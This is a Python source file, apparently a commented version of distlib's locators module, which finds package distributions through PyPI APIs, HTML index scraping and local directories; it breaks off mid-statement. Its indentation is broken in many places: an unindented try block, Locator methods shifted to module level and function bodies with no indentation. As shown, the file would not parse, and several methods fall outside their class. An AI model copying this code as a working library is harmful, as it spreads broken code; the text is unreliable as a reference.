# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)

# Matches URL-fragment digests of the form "<algo>=<hex>", e.g. "md5=...".
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
# Extracts the charset parameter from a Content-Type header value.
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
# Content types treated as HTML/XHTML index pages.
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
    """
    Return all distribution names known by an index.
    :param url: The URL of the index.
    :return: A list of all known distribution names.
    """
    index_url = DEFAULT_INDEX if url is None else url
    client = ServerProxy(index_url, timeout=3.0)
    try:
        return client.list_packages()
    finally:
        # `client('close')` resolves the proxy's close method; invoking it
        # releases the underlying transport.
        client('close')()
class RedirectHandler(BaseRedirectHandler):
    """
    A class to work around a bug in some Python 3.2.x releases.
    """
    # There's a bug in the base version for some 3.2.x
    # (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
    # returns e.g. /abc, it bails because it says the scheme ''
    # is bogus, when actually it should use the request's
    # URL for the scheme. See Python issue #13696.
    def http_error_302(self, req, fp, code, msg, headers):
        """Absolutise a scheme-less redirect target before delegating."""
        # Some servers (incorrectly) return multiple Location headers
        # (so probably same goes for URI). Use first header.
        target = None
        matched_key = None
        for matched_key in ('location', 'uri'):
            if matched_key in headers:
                target = headers[matched_key]
                break
        if target is None:  # pragma: no cover
            return
        if urlparse(target).scheme == '':
            # Relative redirect: resolve against the request URL and write
            # the absolute form back into the headers.
            target = urljoin(req.get_full_url(), target)
            if hasattr(headers, 'replace_header'):
                headers.replace_header(matched_key, target)
            else:
                headers[matched_key] = target
        return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
                                                  headers)

    http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
    """
    A base class for locators - things that locate distributions.
    """
    # Extensions treated as source archives.
    source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
    # Extensions treated as binary distributions.
    binary_extensions = ('.egg', '.exe', '.whl')
    # Extensions never considered download candidates.
    excluded_extensions = ('.pdf',)

    # A list of tags indicating which wheels you want to match. The default
    # value of None matches against the tags compatible with the running
    # Python. If you want to match other values, set wheel_tags on a locator
    # instance to a list of tuples (pyver, abi, arch) which you want to match.
    wheel_tags = None

    # Extensions this locator will offer for download (sources plus wheels).
    downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
    """
    Initialise an instance.
    :param scheme: Because locators look for most recent versions, they
                   need to know the version scheme to use. This specifies
                   the current PEP-recommended scheme - use ``'legacy'``
                   if you need to support existing distributions on PyPI.
    """
    self._cache = {}  # project name -> result of _get_project(); see get_project()
    self.scheme = scheme
    # Because of bugs in some of the handlers on some of the platforms,
    # we use our own opener rather than just using urlopen.
    self.opener = build_opener(RedirectHandler())
    # If get_project() is called from locate(), the matcher instance
    # is set from the requirement passed to locate(). See issue #18 for
    # why this can be useful to know.
    self.matcher = None
    self.errors = queue.Queue()  # collected errors, drained by get_errors()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
    """
    Clear any errors which may have been logged.
    """
    # Just get the errors and throw them away
    self.get_errors()
def clear_cache(self):
    """Discard all cached project lookups (see get_project())."""
    self._cache.clear()
def _get_scheme(self):
    return self._scheme

def _set_scheme(self, value):
    self._scheme = value

# `scheme` is a property wrapping the private `_scheme` attribute.
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
    """
    For a given project, get a dictionary mapping available versions to Distribution
    instances.

    This should be implemented in subclasses.

    If called from a locate() request, self.matcher will be set to a
    matcher for the requirement to satisfy, otherwise it will be None.
    """
    raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
    """
    Return all the distribution names known to this locator.
    """
    raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.python.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
    """
    Choose one of two URLs where both are candidates for distribution
    archives for the same version of a distribution (for example,
    .tar.gz vs. zip).

    The current implementation favours https:// URLs over http://, archives
    from PyPI over those from other locations, wheel compatibility (if a
    wheel) and then the archive name.
    """
    if not url1:
        logger.debug('Replacing %r with %r', url1, url2)
        return url2
    if self.score_url(url1) > self.score_url(url2):
        logger.debug('Not replacing %r with %r', url1, url2)
        return url1
    logger.debug('Replacing %r with %r', url1, url2)
    return url2
def split_filename(self, filename, project_name):
    """
    Attempt to split a filename in project name, version and Python version.
    """
    # Delegates to the module-level split_filename helper (imported from
    # .util at the top of the file).
    return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
    """
    See if a URL is a candidate for a download URL for a project (the URL
    has typically been scraped from an HTML page).

    If it is, a dictionary is returned with keys "name", "version",
    "filename" and "url"; otherwise, None is returned.
    """

    def same_project(name1, name2):
        return normalize_name(name1) == normalize_name(name2)

    result = None
    scheme, netloc, path, params, query, frag = urlparse(url)
    if frag.lower().startswith('egg='):  # pragma: no cover
        logger.debug('%s: version hint in fragment: %r',
                     project_name, frag)
    # An "algo=digest" fragment (e.g. "sha256=<hex>") supplies a checksum,
    # attached to the result at the end.
    m = HASHER_HASH.match(frag)
    if m:
        algo, digest = m.groups()
    else:
        algo, digest = None, None
    # Keep the original path for the returned URL; strip a trailing slash
    # only for extension matching.
    origpath = path
    if path and path[-1] == '/':  # pragma: no cover
        path = path[:-1]
    if path.endswith('.whl'):
        try:
            wheel = Wheel(path)
            if not is_compatible(wheel, self.wheel_tags):
                logger.debug('Wheel not compatible: %s', path)
            else:
                if project_name is None:
                    include = True
                else:
                    include = same_project(wheel.name, project_name)
                if include:
                    result = {
                        'name': wheel.name,
                        'version': wheel.version,
                        'filename': wheel.filename,
                        'url': urlunparse((scheme, netloc, origpath,
                                           params, query, '')),
                        'python-version': ', '.join(
                            ['.'.join(list(v[2:])) for v in wheel.pyver]),
                    }
        except Exception as e:  # pragma: no cover
            logger.warning('invalid path for wheel: %s', path)
    elif not path.endswith(self.downloadable_extensions):  # pragma: no cover
        logger.debug('Not downloadable: %s', path)
    else:  # downloadable extension
        path = filename = posixpath.basename(path)
        for ext in self.downloadable_extensions:
            if path.endswith(ext):
                path = path[:-len(ext)]
                t = self.split_filename(path, project_name)
                if not t:  # pragma: no cover
                    logger.debug('No match for project/version: %s', path)
                else:
                    name, version, pyver = t
                    if not project_name or same_project(project_name, name):
                        result = {
                            'name': name,
                            'version': version,
                            'filename': filename,
                            'url': urlunparse((scheme, netloc, origpath,
                                               params, query, '')),
                            #'packagetype': 'sdist',
                        }
                        if pyver:  # pragma: no cover
                            result['python-version'] = pyver
                break
    if result and algo:
        result['%s_digest' % algo] = digest
    return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
    def _update_version_data(self, result, info):
        """
        Update a result dictionary (the final result from _get_project) with a
        dictionary for a specific version, which typically holds information
        gleaned from a filename or URL for an archive for the distribution.

        Note that *info* is consumed: its 'name' and 'version' keys are
        popped off before the remainder is used for digest lookup.
        """
        name = info.pop('name')
        version = info.pop('version')
        # Reuse any Distribution already recorded for this version; otherwise
        # make a fresh one using the locator's version scheme.
        if version in result:
            dist = result[version]
            md = dist.metadata
        else:
            dist = make_dist(name, version, scheme=self.scheme)
            md = dist.metadata
        # Any remaining '<algo>_digest' entries yield an (algo, digest) pair.
        dist.digest = digest = self._get_digest(info)
        url = info['url']
        result['digests'][url] = digest
        # Keep the "best" source URL according to prefer_url.
        if md.source_url != info['url']:
            md.source_url = self.prefer_url(md.source_url, url)
        result['urls'].setdefault(version, set()).add(url)
        dist.locator = self
        result[version] = dist
    def locate(self, requirement, prereleases=False):
        """
        Find the most recent distribution which matches the given
        requirement.
        :param requirement: A requirement of the form 'foo (1.0)' or perhaps
                            'foo (>= 1.0, < 2.0, != 1.3)'
        :param prereleases: If ``True``, allow pre-release versions
                            to be located. Otherwise, pre-release versions
                            are not returned.
        :return: A :class:`Distribution` instance, or ``None`` if no such
                 distribution could be located.
        """
        result = None
        r = parse_requirement(requirement)
        if r is None: # pragma: no cover
            raise DistlibException('Not a valid requirement: %r' % requirement)
        scheme = get_scheme(self.scheme)
        # self.matcher is also consulted by AggregatingLocator._get_project
        # while this lookup is in progress; it is reset to None on the way out.
        self.matcher = matcher = scheme.matcher(r.requirement)
        logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
        versions = self.get_project(r.name)
        if len(versions) > 2: # urls and digests keys are present
            # sometimes, versions are invalid
            slist = []
            vcls = matcher.version_class
            for k in versions:
                # 'urls' and 'digests' are bookkeeping entries, not versions.
                if k in ('urls', 'digests'):
                    continue
                try:
                    if not matcher.match(k):
                        logger.debug('%s did not match %r', matcher, k)
                    else:
                        if prereleases or not vcls(k).is_prerelease:
                            slist.append(k)
                        else:
                            logger.debug('skipping pre-release '
                                         'version %s of %s', k, matcher.name)
                except Exception: # pragma: no cover
                    logger.warning('error matching %s with %r', matcher, k)
                    pass # slist.append(k)
            # Sort ascending by the scheme's key; the best match is slist[-1].
            if len(slist) > 1:
                slist = sorted(slist, key=scheme.key)
            if slist:
                logger.debug('sorted list: %s', slist)
                version = slist[-1]
                result = versions[version]
        if result:
            # Decorate the located distribution with the requested extras,
            # its known download URLs and any recorded digests.
            if r.extras:
                result.extras = r.extras
            result.download_urls = versions.get('urls', {}).get(version, set())
            d = {}
            sd = versions.get('digests', {})
            for url in result.download_urls:
                if url in sd: # pragma: no cover
                    d[url] = sd[url]
            result.digests = d
        self.matcher = None
        return result
class PyPIRPCLocator(Locator):
    """
    This locator uses XML-RPC to locate distributions. It therefore
    cannot be used with simple mirrors (that only mirror file content).
    """
    def __init__(self, url, **kwargs):
        """
        Initialise an instance.
        :param url: The URL to use for XML-RPC.
        :param kwargs: Passed to the superclass constructor.
        """
        super(PyPIRPCLocator, self).__init__(**kwargs)
        self.base_url = url
        self.client = ServerProxy(url, timeout=3.0)
    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        return set(self.client.list_packages())
    def _get_project(self, name):
        """
        Query the XML-RPC API for every release of *name* and build the
        version -> Distribution mapping expected by Locator.get_project,
        including the 'urls' and 'digests' bookkeeping entries.
        """
        result = {'urls': {}, 'digests': {}}
        versions = self.client.package_releases(name, True)
        for v in versions:
            urls = self.client.release_urls(name, v)
            data = self.client.release_data(name, v)
            metadata = Metadata(scheme=self.scheme)
            metadata.name = data['name']
            metadata.version = data['version']
            metadata.license = data.get('license')
            metadata.keywords = data.get('keywords', [])
            metadata.summary = data.get('summary')
            dist = Distribution(metadata)
            if urls:
                # The first download URL is treated as the canonical source
                # URL; releases with no URLs at all are skipped entirely.
                info = urls[0]
                metadata.source_url = info['url']
                dist.digest = self._get_digest(info)
                dist.locator = self
                result[v] = dist
                for info in urls:
                    url = info['url']
                    digest = self._get_digest(info)
                    result['urls'].setdefault(v, set()).add(url)
                    result['digests'][url] = digest
        return result
class PyPIJSONLocator(Locator):
    """
    This locator uses PyPI's JSON interface. It's very limited in functionality
    and probably not worth using.
    """
    def __init__(self, url, **kwargs):
        """
        Initialise an instance.
        :param url: The base URL for the JSON API; a trailing slash is
                    ensured.
        :param kwargs: Passed to the superclass constructor.
        """
        super(PyPIJSONLocator, self).__init__(**kwargs)
        self.base_url = ensure_slash(url)
    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        raise NotImplementedError('Not available from this locator')
    def _get_project(self, name):
        """
        Fetch '<base>/<name>/json' and convert the response into the mapping
        expected by Locator.get_project: version -> Distribution, plus the
        'urls' and 'digests' bookkeeping entries.

        Network or parsing failures are recorded on self.errors and logged;
        an empty result is returned in that case.
        """
        result = {'urls': {}, 'digests': {}}
        url = urljoin(self.base_url, '%s/json' % quote(name))
        try:
            resp = self.opener.open(url)
            data = resp.read().decode() # for now
            d = json.loads(data)
            md = Metadata(scheme=self.scheme)
            data = d['info']
            md.name = data['name']
            md.version = data['version']
            md.license = data.get('license')
            md.keywords = data.get('keywords', [])
            md.summary = data.get('summary')
            dist = Distribution(md)
            dist.locator = self
            result[md.version] = dist
            for info in d['urls']:
                url = info['url']
                # Compute the digest once and reuse it for both mappings
                # (previously computed twice per URL).
                digest = self._get_digest(info)
                dist.download_urls.add(url)
                dist.digests[url] = digest
                result['urls'].setdefault(md.version, set()).add(url)
                result['digests'][url] = digest
            # Now get other releases
            for version, infos in d['releases'].items():
                if version == md.version:
                    continue    # already done
                omd = Metadata(scheme=self.scheme)
                omd.name = md.name
                omd.version = version
                odist = Distribution(omd)
                odist.locator = self
                result[version] = odist
                for info in infos:
                    url = info['url']
                    digest = self._get_digest(info)
                    odist.download_urls.add(url)
                    odist.digests[url] = digest
                    result['urls'].setdefault(version, set()).add(url)
                    result['digests'][url] = digest
        except Exception as e:
            self.errors.put(text_type(e))
            logger.exception('JSON fetch failed: %s', e)
        return result
class Page(object):
    """
    This class represents a scraped HTML page.
    """
    # The following slightly hairy-looking regex just looks for the contents of
    # an anchor link, which has an attribute "href" either immediately preceded
    # or immediately followed by a "rel" attribute. The attribute values can be
    # declared with double quotes, single quotes or no quotes - which leads to
    # the length of the expression.
    _href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
    _base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
    def __init__(self, data, url):
        """
        Initialise an instance with the Unicode page contents and the URL they
        came from.
        """
        self.data = data
        self.base_url = self.url = url
        # Honour a <base href="..."> tag, which overrides the page URL when
        # resolving relative links.
        m = self._base.search(self.data)
        if m:
            self.base_url = m.group(1)
    _clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
    @cached_property
    def links(self):
        """
        Return the URLs of all the links on a page together with information
        about their "rel" attribute, for determining which ones to treat as
        downloads and which ones to queue for further scraping.
        """
        def clean(url):
            "Tidy up an URL."
            scheme, netloc, path, params, query, frag = urlparse(url)
            return urlunparse((scheme, netloc, quote(path),
                               params, query, frag))
        result = set()
        for match in self._href.finditer(self.data):
            d = match.groupdict('')
            rel = (d['rel1'] or d['rel2'] or d['rel3'] or
                   d['rel4'] or d['rel5'] or d['rel6'])
            url = d['url1'] or d['url2'] or d['url3']
            url = urljoin(self.base_url, url)
            url = unescape(url)
            # Percent-encode any character not acceptable in a URL.
            # BUGFIX: use '%02x' rather than '%2x' - the latter space-pads
            # ordinals below 0x10 (e.g. '% a'), which is not valid
            # percent-encoding per RFC 3986.
            url = self._clean_re.sub(lambda m: '%%%02x' % ord(m.group(0)), url)
            result.add((url, rel))
        # We sort the result, hoping to bring the most recent versions
        # to the front
        result = sorted(result, key=lambda t: t[0], reverse=True)
        return result
class SimpleScrapingLocator(Locator):
    """
    A locator which scrapes HTML pages to locate downloads for a distribution.
    This runs multiple threads to do the I/O; performance is at least as good
    as pip's PackageFinder, which works in an analogous fashion.
    """
    # These are used to deal with various Content-Encoding schemes.
    decoders = {
        'deflate': zlib.decompress,
        # BUGFIX: the lambda argument is 'b'; it previously referenced the
        # undefined name 'd', so any gzip-encoded response raised NameError
        # instead of being decompressed.
        'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
        'none': lambda b: b,
    }
    def __init__(self, url, timeout=None, num_workers=10, **kwargs):
        """
        Initialise an instance.
        :param url: The root URL to use for scraping.
        :param timeout: The timeout, in seconds, to be applied to requests.
                        This defaults to ``None`` (no timeout specified).
        :param num_workers: The number of worker threads you want to do I/O,
                            This defaults to 10.
        :param kwargs: Passed to the superclass.
        """
        super(SimpleScrapingLocator, self).__init__(**kwargs)
        self.base_url = ensure_slash(url)
        self.timeout = timeout
        self._page_cache = {}
        self._seen = set()
        self._to_fetch = queue.Queue()
        self._bad_hosts = set()
        self.skip_externals = False
        self.num_workers = num_workers
        self._lock = threading.RLock()
        # See issue #45: we need to be resilient when the locator is used
        # in a thread, e.g. with concurrent.futures. We can't use self._lock
        # as it is for coordinating our internal threads - the ones created
        # in _prepare_threads.
        self._gplock = threading.RLock()
        self.platform_check = False # See issue #112
    def _prepare_threads(self):
        """
        Threads are created only when get_project is called, and terminate
        before it returns. They are there primarily to parallelise I/O (i.e.
        fetching web pages).
        """
        self._threads = []
        for i in range(self.num_workers):
            t = threading.Thread(target=self._fetch)
            # daemon attribute instead of the deprecated setDaemon() call.
            t.daemon = True
            t.start()
            self._threads.append(t)
    def _wait_threads(self):
        """
        Tell all the threads to terminate (by sending a sentinel value) and
        wait for them to do so.
        """
        # Note that you need two loops, since you can't say which
        # thread will get each sentinel
        for t in self._threads:
            self._to_fetch.put(None)    # sentinel
        for t in self._threads:
            t.join()
        self._threads = []
    def _get_project(self, name):
        """
        Scrape the project's index page (and anything it links to) using the
        worker threads, accumulating download info into the shared result.
        """
        result = {'urls': {}, 'digests': {}}
        with self._gplock:
            # self.result / self.project_name are shared with the worker
            # threads for the duration of this call only.
            self.result = result
            self.project_name = name
            url = urljoin(self.base_url, '%s/' % quote(name))
            self._seen.clear()
            self._page_cache.clear()
            self._prepare_threads()
            try:
                logger.debug('Queueing %s', url)
                self._to_fetch.put(url)
                self._to_fetch.join()
            finally:
                self._wait_threads()
            del self.result
        return result
    platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
                                    r'win(32|_amd64)|macosx_?\d+)\b', re.I)
    def _is_platform_dependent(self, url):
        """
        Does an URL refer to a platform-specific download?
        """
        return self.platform_dependent.search(url)
    def _process_download(self, url):
        """
        See if an URL is a suitable download for a project.
        If it is, register information in the result dictionary (for
        _get_project) about the specific version it's for.
        Note that the return value isn't actually used other than as a boolean
        value.
        """
        if self.platform_check and self._is_platform_dependent(url):
            info = None
        else:
            info = self.convert_url_to_download_info(url, self.project_name)
        logger.debug('process_download: %s -> %s', url, info)
        if info:
            with self._lock:    # needed because self.result is shared
                self._update_version_data(self.result, info)
        return info
    def _should_queue(self, link, referrer, rel):
        """
        Determine whether a link URL from a referring page and with a
        particular "rel" attribute should be queued for scraping.
        """
        scheme, netloc, path, _, _, _ = urlparse(link)
        if path.endswith(self.source_extensions + self.binary_extensions +
                         self.excluded_extensions):
            result = False
        elif self.skip_externals and not link.startswith(self.base_url):
            result = False
        elif not referrer.startswith(self.base_url):
            result = False
        elif rel not in ('homepage', 'download'):
            result = False
        elif scheme not in ('http', 'https', 'ftp'):
            result = False
        elif self._is_platform_dependent(link):
            result = False
        else:
            host = netloc.split(':', 1)[0]
            if host.lower() == 'localhost':
                result = False
            else:
                result = True
        logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
                     referrer, result)
        return result
    def _fetch(self):
        """
        Get a URL to fetch from the work queue, get the HTML page, examine its
        links for download candidates and candidates for further scraping.
        This is a handy method to run in a thread.
        """
        while True:
            url = self._to_fetch.get()
            try:
                if url:
                    page = self.get_page(url)
                    if page is None:    # e.g. after an error
                        continue
                    for link, rel in page.links:
                        if link not in self._seen:
                            try:
                                self._seen.add(link)
                                if (not self._process_download(link) and
                                        self._should_queue(link, url, rel)):
                                    logger.debug('Queueing %s from %s', link, url)
                                    self._to_fetch.put(link)
                            except MetadataInvalidError:    # e.g. invalid versions
                                pass
            except Exception as e:  # pragma: no cover
                self.errors.put(text_type(e))
            finally:
                # always do this, to avoid hangs :-)
                self._to_fetch.task_done()
            if not url:
                #logger.debug('Sentinel seen, quitting.')
                break
    def get_page(self, url):
        """
        Get the HTML for an URL, possibly from an in-memory cache.
        XXX TODO Note: this cache is never actually cleared. It's assumed that
        the data won't get stale over the lifetime of a locator instance (not
        necessarily true for the default_locator).
        """
        # http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
        scheme, netloc, path, _, _, _ = urlparse(url)
        if scheme == 'file' and os.path.isdir(url2pathname(path)):
            url = urljoin(ensure_slash(url), 'index.html')
        if url in self._page_cache:
            result = self._page_cache[url]
            logger.debug('Returning %s from cache: %s', url, result)
        else:
            host = netloc.split(':', 1)[0]
            result = None
            if host in self._bad_hosts:
                logger.debug('Skipping %s due to bad host %s', url, host)
            else:
                req = Request(url, headers={'Accept-encoding': 'identity'})
                try:
                    logger.debug('Fetching %s', url)
                    resp = self.opener.open(req, timeout=self.timeout)
                    logger.debug('Fetched %s', url)
                    headers = resp.info()
                    content_type = headers.get('Content-Type', '')
                    if HTML_CONTENT_TYPE.match(content_type):
                        final_url = resp.geturl()
                        data = resp.read()
                        encoding = headers.get('Content-Encoding')
                        if encoding:
                            decoder = self.decoders[encoding]   # fail if not found
                            data = decoder(data)
                        encoding = 'utf-8'
                        m = CHARSET.search(content_type)
                        if m:
                            encoding = m.group(1)
                        try:
                            data = data.decode(encoding)
                        except UnicodeError: # pragma: no cover
                            data = data.decode('latin-1')    # fallback
                        result = Page(data, final_url)
                        self._page_cache[final_url] = result
                except HTTPError as e:
                    if e.code != 404:
                        logger.exception('Fetch failed: %s: %s', url, e)
                except URLError as e: # pragma: no cover
                    logger.exception('Fetch failed: %s: %s', url, e)
                    with self._lock:
                        self._bad_hosts.add(host)
                except Exception as e: # pragma: no cover
                    logger.exception('Fetch failed: %s: %s', url, e)
                finally:
                    self._page_cache[url] = result  # even if None (failure)
        return result
    _distname_re = re.compile('<a href=[^>]*>([^<]+)<')
    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        page = self.get_page(self.base_url)
        if not page:
            raise DistlibException('Unable to get %s' % self.base_url)
        for match in self._distname_re.finditer(page.data):
            result.add(match.group(1))
        return result
class DirectoryLocator(Locator):
    """
    This class locates distributions in a directory tree.
    """
    def __init__(self, path, **kwargs):
        """
        Initialise an instance.
        :param path: The root of the directory tree to search.
        :param kwargs: Passed to the superclass constructor,
                       except for:
                       * recursive - if True (the default), subdirectories are
                         recursed into. If False, only the top-level directory
                         is searched,
        """
        self.recursive = kwargs.pop('recursive', True)
        super(DirectoryLocator, self).__init__(**kwargs)
        path = os.path.abspath(path)
        if not os.path.isdir(path):  # pragma: no cover
            raise DistlibException('Not a directory: %r' % path)
        self.base_dir = path
    def should_include(self, filename, parent):
        """
        Should a filename be considered as a candidate for a distribution
        archive? As well as the filename, the directory which contains it
        is provided, though not used by the current implementation.
        """
        return filename.endswith(self.downloadable_extensions)
    def _candidate_urls(self):
        """
        Yield a file:// URL for every file under base_dir that looks like a
        distribution archive, honouring the ``recursive`` flag.

        Factored out of _get_project / get_distribution_names, which
        previously duplicated this traversal logic.
        """
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    yield urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
            if not self.recursive:
                break
    def _get_project(self, name):
        """
        Scan the directory tree for archives of *name* and build the usual
        version -> Distribution result mapping.
        """
        result = {'urls': {}, 'digests': {}}
        for url in self._candidate_urls():
            info = self.convert_url_to_download_info(url, name)
            if info:
                self._update_version_data(result, info)
        return result
    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        for url in self._candidate_urls():
            info = self.convert_url_to_download_info(url, None)
            if info:
                result.add(info['name'])
        return result
class JSONLocator(Locator):
    """
    This locator uses special extended metadata (not available on PyPI) and is
    the basis of performant dependency resolution in distlib. Other locators
    require archive downloads before dependencies can be determined! As you
    might imagine, that can be slow.
    """
    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        raise NotImplementedError('Not available from this locator')
    def _get_project(self, name):
        """
        Build the version -> Distribution mapping from the project's extended
        metadata (fetched via get_project_data), which already carries
        dependency information.
        """
        result = {'urls': {}, 'digests': {}}
        data = get_project_data(name)
        if data:
            for info in data.get('files', []):
                # Only source distributions are considered here.
                if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
                    continue
                # We don't store summary in project metadata as it makes
                # the data bigger for no benefit during dependency
                # resolution
                dist = make_dist(data['name'], info['version'],
                                 summary=data.get('summary',
                                                  'Placeholder for summary'),
                                 scheme=self.scheme)
                md = dist.metadata
                md.source_url = info['url']
                # TODO SHA256 digest
                if 'digest' in info and info['digest']:
                    dist.digest = ('md5', info['digest'])
                md.dependencies = info.get('requirements', {})
                dist.exports = info.get('exports', {})
                result[dist.version] = dist
                result['urls'].setdefault(dist.version, set()).add(info['url'])
        return result
class DistPathLocator(Locator):
    """
    This locator finds installed distributions in a path. It can be useful for
    adding to an :class:`AggregatingLocator`.
    """
    def __init__(self, distpath, **kwargs):
        """
        Initialise an instance.
        :param distpath: A :class:`DistributionPath` instance to search.
        """
        super(DistPathLocator, self).__init__(**kwargs)
        assert isinstance(distpath, DistributionPath)
        self.distpath = distpath
    def _get_project(self, name):
        """
        Look *name* up among the installed distributions.

        Returns the usual result mapping, empty (bar the bookkeeping keys)
        when the distribution is not installed. No digest is available for
        an installed distribution, hence the ``set([None])`` entry.
        """
        dist = self.distpath.get_distribution(name)
        if dist is None:
            return {'urls': {}, 'digests': {}}
        version = dist.version
        return {
            version: dist,
            'urls': {version: set([dist.source_url])},
            'digests': {version: set([None])}
        }
class AggregatingLocator(Locator):
    """
    This class allows you to chain and/or merge a list of locators.
    """
    def __init__(self, *locators, **kwargs):
        """
        Initialise an instance.
        :param locators: The list of locators to search.
        :param kwargs: Passed to the superclass constructor,
                       except for:
                       * merge - if False (the default), the first successful
                         search from any of the locators is returned. If True,
                         the results from all locators are merged (this can be
                         slow).
        """
        self.merge = kwargs.pop('merge', False)
        self.locators = locators
        super(AggregatingLocator, self).__init__(**kwargs)
    def clear_cache(self):
        """
        Clear this locator's cache as well as each child locator's.
        """
        super(AggregatingLocator, self).clear_cache()
        for locator in self.locators:
            locator.clear_cache()
    def _set_scheme(self, value):
        # Propagate scheme changes to all child locators so they stay in sync.
        self._scheme = value
        for locator in self.locators:
            locator.scheme = value
    scheme = property(Locator.scheme.fget, _set_scheme)
    def _get_project(self, name):
        """
        Query the child locators in order, either merging all of their
        results (merge=True) or returning the first usable one (merge=False).
        """
        result = {}
        for locator in self.locators:
            d = locator.get_project(name)
            if d:
                if self.merge:
                    # Preserve existing bookkeeping before update() below
                    # potentially overwrites it, then merge it back in.
                    files = result.get('urls', {})
                    digests = result.get('digests', {})
                    # next line could overwrite result['urls'], result['digests']
                    result.update(d)
                    df = result.get('urls')
                    if files and df:
                        for k, v in files.items():
                            if k in df:
                                df[k] |= v
                            else:
                                df[k] = v
                    dd = result.get('digests')
                    if digests and dd:
                        dd.update(digests)
                else:
                    # See issue #18. If any dists are found and we're looking
                    # for specific constraints, we only return something if
                    # a match is found. For example, if a DirectoryLocator
                    # returns just foo (1.0) while we're looking for
                    # foo (>= 2.0), we'll pretend there was nothing there so
                    # that subsequent locators can be queried. Otherwise we
                    # would just return foo (1.0) which would then lead to a
                    # failure to find foo (>= 2.0), because other locators
                    # weren't searched. Note that this only matters when
                    # merge=False.
                    if self.matcher is None:
                        found = True
                    else:
                        found = False
                        for k in d:
                            if self.matcher.match(k):
                                found = True
                                break
                    if found:
                        result = d
                        break
        return result
    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        for locator in self.locators:
            try:
                result |= locator.get_distribution_names()
            except NotImplementedError:
                pass
        return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
# Module-level default: try the fast extended-metadata JSONLocator first,
# then fall back to scraping the PyPI simple index.
default_locator = AggregatingLocator(
                    JSONLocator(),
                    SimpleScrapingLocator('https://pypi.python.org/simple/',
                                          timeout=3.0),
                    scheme='legacy')
# Convenience alias so callers can use locate(...) directly.
locate = default_locator.locate
# Matches requirements of the form 'name (1.0)' or 'name (== 1.0)'.
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
